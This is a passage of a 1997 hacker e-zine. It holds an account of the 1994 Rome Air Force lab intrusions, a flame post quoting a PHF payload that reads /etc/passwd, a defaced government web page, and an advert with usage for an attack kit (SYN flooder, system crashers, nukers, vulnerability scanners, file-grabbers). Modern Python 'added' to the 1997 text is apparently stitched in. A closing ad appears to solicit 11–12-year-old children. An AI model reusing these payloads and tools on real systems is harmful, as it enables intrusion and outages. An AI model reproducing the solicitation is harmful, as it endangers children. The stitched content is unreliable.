first time on March 25, according to the report. Passwords had been
compromised, electronic mail read and deleted and unclassified
"battlefield simulation" data copied off the facility. The
Rome network was also used as a staging area for penetration of other
systems on the Internet.

AFOSI investigators initially traced the break-in back one step to
the New York City provider, Mindvox. According to the Congressional
report, this put the NYC provider under suspicion because "newspaper
articles" said Mindvox's computer security was furnished by two "former
Legion of Doom members." "The Legion of Doom is a loose-knit computer
hacker group which had several members convicted for intrusions into
corporate telephone switches in 1990 and 1991," wrote Gelber and Christy.

AFOSI then got permission to begin monitoring -- the equivalent of
wiretapping -- all communications on the Air Force network. Limited
observation of other Internet providers being used during the break-in
was conducted from the Rome facilities. Monitoring told the investigators
the handles of hackers involved in the Rome break-in were Datastream
Cowboy and Kuji.

Since the monitoring was of limited value in determining the whereabouts
of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence
network of informants, i.e., stool pigeons, that 'surf the Internet.'"
Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from
Britain. The anonymous source said he had e-mail correspondence with
Datastream Cowboy in which the hacker said he was a 16-year old living in
England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also
apparently ran a bulletin board system and gave the telephone number to the
AFOSI source.

The Air Force team contacted New Scotland Yard and the British law
enforcement agency identified the residence, the home of Richard
Pryce, which corresponded to Datastream Cowboy's system phone number.
English authorities began observing Pryce's phone calls and noticed
he was making fraudulent use of British Telecom. In addition,
whenever intrusions at the Air Force network in Rome occurred, Pryce's
number was seen to be making illegal calls out of Britain.

Pryce travelled everywhere on the Internet, going through South America,
multiple countries in Europe and Mexico, occasionally entering the Rome
network. From Air Force computers, he would enter systems at Jet
Propulsion Laboratory in Pasadena, California, and the Goddard Space
Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins
and passwords of the Air Force networks in Rome, he was then able to
get into the home systems of Rome network users, defense contractors
like Lockheed.

By mid-April of 1994 the Air Force was monitoring other systems being
used by the British hackers. On the 14th of the month, Kuji logged on
to the Goddard Space Center from a system in Latvia and copied data
from it to the Baltic country. According to Gelber's report, the
AFOSI investigators assumed the worst, that it was a sign that someone
in an eastern European country was making a grab for sensitive
information. They broke the connection but not before Kuji had
copied files off the Goddard system. As it turned out, the Latvian
computer was just another system the British hackers were using as
a stepping stone; Pryce had also used it to cover his tracks when
penetrating networks at Wright-Patterson Air Force Base in Ohio, via
an intermediate system in Seattle, cyberspace.com.

The next day, Kuji was again observed trying to probe various
systems at NATO in Brussels and The Hague as well as Wright-Patterson.
On the 19th, Pryce successfully returned to NATO systems in The
Hague through Mindvox. The point Gelber and Christy seem to be trying
to make is that Kuji, a 21-year old, was coaching Pryce during some
of his attacks on various systems.

By this point, New Scotland Yard had a search warrant for Pryce
with the plan being to swoop down on him the next time he accessed
the Air Force network in Rome.

In April, Pryce penetrated a system on the Korean peninsula and copied
material off a facility called the Korean Atomic Research Institute
to an Air Force computer in Rome. At the time, the investigators had
no idea whether the system was in North or South Korea. The impression
created is one of hysteria and confusion at Rome. There was fear that the
system, if in North Korea, would trigger an international incident, with
the hack interpreted as an "aggressive act of war." The system turned
out to be in South Korea.

During the Korean break-in, New Scotland Yard could have intervened and
arrested Pryce. However, for unknown reasons, the agency did not. Those
with good memories may recall mainstream news reports concerning Pryce's
hack, which was cast as an entry into sensitive North Korean networks.

It's worth noting that while the story was portrayed as the work of
an anonymous hacker, both the U.S. government and New Scotland Yard knew
who the perpetrator was. Further, according to Gelber's report English
authorities already had a search warrant for Pryce's house.

Finally, on May 12 British authorities pounced. Pryce was arrested
and his residence searched. He crumbled, according to the Times of
London, and began to cry. Gelber and Christy write that Pryce promptly
admitted to the Air Force break-ins as well as others. Pryce
confessed he had copied a large program that used artificial intelligence
to construct theoretical Air Orders of Battle from an Air Force computer
to Mindvox and left it there because of its great size, 3-4 megabytes.
Pryce paid for his Internet service with a fraudulent credit card number.
At the time, the investigators were unable to find out the name and
whereabouts of Kuji. A lead to an Australian underground bulletin board
system failed to pan out.

On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew
Bevan -- a computer technician, had been arrested and charged in
connection with the 1994 Air Force break-ins in Rome.

Rocker Tom Petty sang that even the losers get lucky some time. He
wasn't thinking of British computer hackers but no better words could be
used to describe the two Englishmen and a two-year-old chain of events that
led to fame as international computer terrorists in front of Congress
at the beginning of the summer of 1996.

Lacking much evidence for the case of conspiratorial computer-waged
campaigns of terror and chaos against the U.S., the makers of Congressional
reports resorted to telling the same story over and over, three
times in the space of the hearings on the subject. One envisions U.S.
Congressmen too stupid or apathetic to complain, "Hey, didn't we get that
yesterday, and the day before?" Pryce and Bevan appeared in "Security in
Cyberspace" and twice in Government Accounting Office reports AIMD-96-84
and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace"
and the Air Force Office of Special Investigations' source for the Pryce
case supplied the same tale for Jack Brock, author of the GAO reports.
Brock writes, ". . . Air Force officials told us that at least one of
the hackers may have been working for a foreign country interested in
obtaining military research data or areas in which the Air Force was
conducting advanced research." It was, apparently, more wishful
thinking.

This year's UK hacking conference : Access All Areas.
http://www.access.org.uk
July 5th.

???????????????????????????????????????????????????????????????????????????????
2. [GUNNAR], MadSeason and sIn : so1o
???????????????????????????????????????????????????????????????????????????????
Some dudes called MadSeason and [GUNNAR] have been proving sIn's true lameness
and logging it all at the same time, phear elite logging skills...

##################################################################################
# #
# Darkfool #
# (What a Fool/The PHF hacker) #
# BY [GUNNAR] #
# #
##################################################################################

Ever read a hacking txt by this guy? Ever realize just how useless the
information in his txts is? Nothing in his txt files isn't covered in a hundred
text files written before, which better explain hacking techniques. Like a quote
from my pal MadSeason goes:

"The fact is these txt files about hacking and phreaking are written by people
with minimal knowledge. Then you have some newbie who comes along wanting to be
some hacker god and reads a few files and has even less of a clue then the
writer had about the subject, then goes around spewing out bullshit and claiming
they are a hacker and/or phreaker, just an endless circle of ignorance."

That quote is so true. All these hack txts released by these groups like
S.I.N. and Techonophoria are just crap. About the only exploit that Darkfool
knows is the PHF bug found in older versions of NCSA and Apache httpd. This
bug is very well known (and over-exploited, might I add). Doing a search for ac.jp
or edu.au domains and adding "cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd"
to the address is neither impressive nor is it even hacking. It's a lame excuse
for hacking.

Darkfool claims many things that he doesn't know. For instance, take pascal
programming. He claims to know it, but when asked a single question on it
by, Scorpion(MadSeason), he cannot answer. Here is a little something:

[13:53] <Scorpion> How many parameters do Cluster object constructors take in
pascal, DF?
[13:53] <Darkfool> i have no idea scorpion
[13:54] <Scorpion> I thought you knew Pascal
[13:54] <Darkfool> i am learning it at college

There is a big difference between knowing and learning. I guess Darkfool doesn't
realize that. It's all a part of trying to sound and seem "elite", which
Darkfool is far from being. Seems as though Darkfool and the rest of his S.I.N.
pals are copying MadSeason and myself, and questioning people's abilities. It's
funny though: when MadSeason and I go to #sin questioning them, we get kicked
for making them look stupid. And when they ask us something and it doesn't go
quite as they planned it, look what they do...

[14:14] *** Now talking in #sin
[14:15] <Darkfool> hey
[14:15] <Darkfool> how do i kill all jobs running on a shell ?
<[GUNNAR]> Well hello there!
[14:15] <HoMeR> hey
<[GUNNAR]> kill -9 PID
<[GUNNAR]> If you really wanna kill it.
<[GUNNAR]> Boo Hoo.
<[GUNNAR]> Damn, that one didn't go well for you did it?
<[GUNNAR]> BTW, use the ps command to get the PID.
<[GUNNAR]> la la la la...
[14:17] *** Sinning sets mode: +b *!*@*.wco.com
[14:17] *** You were kicked by Fa|lur3 (banned)

In short, Darkfool, S.I.N. and the rest like him are really just wannabes
trying to sound big and bad. Nothing wrong with groups or people who actually
hack. But, when you have a group like S.I.N. whose members claim more than
they know, it is truly sad. I myself am no great hacker (I'm not a hack.
Plain and simple.) nor am I some s00per programmer. But the thing is, I do not
claim more than I actually know. This is obviously not how Darkfool thinks of
things. He wants to be known as a s00per hacker, which he is not.

I'm writing this so you (The Readers) don't buy into this bullshit and get misled
by people like Darkfool and the group he is in, S.I.N.! They are truly sad
people. What a shame I have brought out the truth!

I think more is somewhere on http://www.ilf.net/teknopia/

???????????????????????????????????????????????????????????????????????????????
3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o
???????????????????????????????????????????????????????????????????????????????
The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend...

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE></TITLE>
<META NAME="Author" CONTENT="Tetsu Khan">
<META NAME="GENERATOR" CONTENT="Mozilla/3.01Gold (Win95; I) [Netscape]">
</HEAD>
<BODY TEXT="#FFFFFF" BGCOLOR="#000000" LINK="#FFFFFF" VLINK="#C0C0C0" ALINK="#FF0000">

<CENTER><P><B><TT><FONT COLOR="#FF0000"><FONT SIZE=+2>Welcome To The [D]epartment
of [O]wned [E]nergy</FONT></FONT></TT></B></P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P>You could define this as an act of aggression, or you could
define it as us, the hackers (or crackers), just advising you to try and
make it more difficult for us, at least employ consultants etc. who have
a CLUE. because one day, in the not so distant future, the internet equivalent
of Pearl Harbour will occur, and we will only be around to say "We
told you so", until that day, we will keep reminding you, get some
security, its better for you, its better for us, its better for everyone.</P></CENTER>

<CENTER><P>In this case, even though your system runs HP-UX, we advise
you still take the time to look into all the exploits that are available
for this operating system, and then get over to www.cert.org to find some
advisories.</P></CENTER>

<CENTER><P>This attack was brought to you in association with 0range Amusements.</P></CENTER>

<CENTER><P><IMG SRC="pac001.gif" HEIGHT=190 WIDTH=175></P></CENTER>

<CENTER><P>Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik,
phractal chaos and all the usual suspects.</P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P><TT><FONT COLOR="#FF0000">In the meantime, maybe you would like
to visit...</FONT></TT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="http://www.crackhouse.com">The CrackHouse</A></FONT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="http://micros0ft.paranoia.com">Micro$oft</A></FONT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="http://www.codez.com">The CodeZero</A></FONT></P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P><B><TT><BLINK><FONT COLOR="#8000FF">We 0wN j00r EnErGy!@# wE
0wN j00R LiGhTbUlBz!@#~</FONT></BLINK></TT></B></P></CENTER>

</BODY>
</HTML>

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ Version 1.666 \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/07/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
???????????????????????????????????????????????????????????????????????????????

New, improved, here it is...

===============================================================================
The Contents Of The Kit :
===============================================================================

dnsscan   : Mass DNS query program, gets lists of systems in entire countries,
            or all the systems on a network, like *.microsoft.com.

smscan    : Sendmail version scanner, very useful.
phpscan   : Scans hosts from a file and outputs a list of php vulnerable sites.
phpget    : Gets files from php vulnerable servers.
phfscan   : Scans hosts from a file and outputs a list of phf vulnerable sites.
ident-scan: Scans all daemons running on ports and determines cool stuff.
imap      : Exploits imap bug if port 143 is open.

tcpprobe  : Very simple portscanner.
fingah    : Uses an apache hole to finger systems if port 79 isn't open.
synk5     : The SYN flooder, basically kicks the shit out of systems.
octopus   : Octopus with UltiMods (ultima of CodeZero), crashes systems.
winuke    : This version allows you to select a port, I advise 139 or 113.

===============================================================================
Usages :
===============================================================================

Use this command to unpack crak.tar...

% tar -xvf crak.tar

It extracts into a crak/ directory under whatever directory you ran it from..

DNSscan :
---------

Usage: dnscan [-file <filename>] [-domain <domain>] [-sub <subdomain>]

-file Uses <filename> as a list of subdomains and servers to scan.
-domain Lists all servers in a top level domain like com or net.
-sub Lists all servers in a domain.

The -domain mode will first create a file called 'domain.<domain>' with a
list of all subdomains and their name servers, and then use that file in
the -file mode.

The input file needs to have the following format:

<domain> <subdomain> [<dns>]

To list all servers in Japan, do "dnscan -domain jp"
To list all servers in the netcom domain, do "dnscan -sub netcom.com"

SMscan : smscan <hosts> <output>
PHPscan : phpscan <infile> <outfile>
PHPget : phpget <domain> <path and file>
PHFscan : phfscan <infile> <outfile>
Ident-Scan : ident-scan <host> [low port] [high port]
TCPprobe : tcpprobe <host>
Fingah : fingah <domain> <user>
Synk5 : synk5 <source ip> <target host> <low port> <high port>
Octopus : octopus <host> [port] (default port is 25)
Winnuke : winnuke <host> [port] (default port is 139)
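
Added example, not the kit's code: the parsing half of what smscan does. A
Sendmail server greets you on port 25 with something like "220 <host> ESMTP
Sendmail <version>/<config-version>; <date>", so a version scanner is a banner
grab plus a regex and a version compare. The banners in SAMPLE_BANNERS are
constructed, and the version floor passed to triage() is whatever the caller
considers too old; the code itself makes no claim about which Sendmail
releases are exploitable.

```python
"""Sendmail banner triage in the spirit of smscan.

Added example, not the kit's code.  SAMPLE_BANNERS are constructed; the
minimum version is caller-supplied and carries no claim about exploitability.
"""
import re
import socket
from typing import Iterable, List, Optional, Tuple

# 220 <host> [ESMTP] Sendmail <ver>[/<config-ver>]; <date>
# "220-" covers the first line of a multi-line greeting.
BANNER_RE = re.compile(
    r"^220[ -](?P<host>\S+)\s+(?:ESMTP\s+)?Sendmail\s+(?P<ver>\d+(?:\.\d+)*)",
    re.IGNORECASE,
)

# Constructed sample greetings, one per line, as smscan's input would look.
SAMPLE_BANNERS = [
    "220 mail.example.com ESMTP Sendmail 8.8.5/8.8.5; Tue, 15 Jul 1997 10:00:00 -0400",
    "220 relay.example.net Sendmail 5.65c/IDA-1.4.4 ready at Tue, 15 Jul 1997 10:00:01 -0400",
    "220-smtp.example.org ESMTP Sendmail 8.7.6/8.7.3; Tue, 15 Jul 1997 10:00:02 GMT",
    "220 mx.example.org ESMTP ready",
    "421 mail.example.com Service not available",
]


def parse_banner(banner: str) -> Optional[Tuple[str, Tuple[int, ...]]]:
    """(host, version tuple) from a 220 greeting, or None if it isn't Sendmail."""
    m = BANNER_RE.match(banner.strip())
    if m is None:
        return None
    version = tuple(int(x) for x in m.group("ver").split("."))
    return m.group("host"), version


def triage(banners: Iterable[str], minimum: Tuple[int, ...]) -> List[Tuple[str, str]]:
    """Return (host, version) for every Sendmail banner older than <minimum>.

    Tuple comparison gives the right answer across differing lengths,
    e.g. (8, 7, 6) < (8, 8, 5) and (5, 65) < (8, 8, 5).
    """
    hits = []
    for banner in banners:
        parsed = parse_banner(banner)
        if parsed is not None and parsed[1] < minimum:
            host, version = parsed
            hits.append((host, ".".join(str(n) for n in version)))
    return hits


def grab_banner(host: str, port: int = 25, timeout: float = 5.0) -> Optional[str]:
    """Live banner grab: connect, read the greeting, hang up.  None if closed."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            return s.recv(512).decode("ascii", "replace")
    except OSError:
        return None


if __name__ == "__main__":
    for host, version in triage(SAMPLE_BANNERS, minimum=(8, 8, 5)):
        print(f"{host:24s} Sendmail {version}")
```

To use it as a scanner, feed grab_banner() each host from smscan's input
file and pass the non-None results to triage(); a greeting that is not
Sendmail, or any line that is not a 220 reply, is skipped rather than guessed at.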

===============================================================================
Where To Get CRAK.tar : http://www.codez.com
===============================================================================

It can be unpacked with WinZip if you are in W1nd0ze too.. :)

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
--------------------------------------+---------------------------------------
|
YOUR SPECIAL AD | LET'S BE FREE
|
COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking
| for men, 12 - 32 clean, fit, and
SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters.
[email protected] | Call Anytime : (816)781-8009
| (Ask for Tommy)
|
--------------------------------------+---------------------------------------
|
ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@
|
Looking for men 11 - 12 for adult | Yeah huney, you know you want me,
video satisfaction. I am 35 into | I'll treat you just right, I'm
Professional wrestling. | waiting for your call today!
Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154
| (Ask for Kim)
--------------------------------------+---------------------------------------
???????????????????????????????????????????????????????????????????????????????
.oO The CodeZero Oo.
???????????????????????????????????????????????????????????????????????????????


???????????????????????????????????????????????????????????????????????????????
Remember, McDonalds Owns You, And Ronald Is The KinG!!!
Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
???????????????????????????????????????????????????????????????????????????????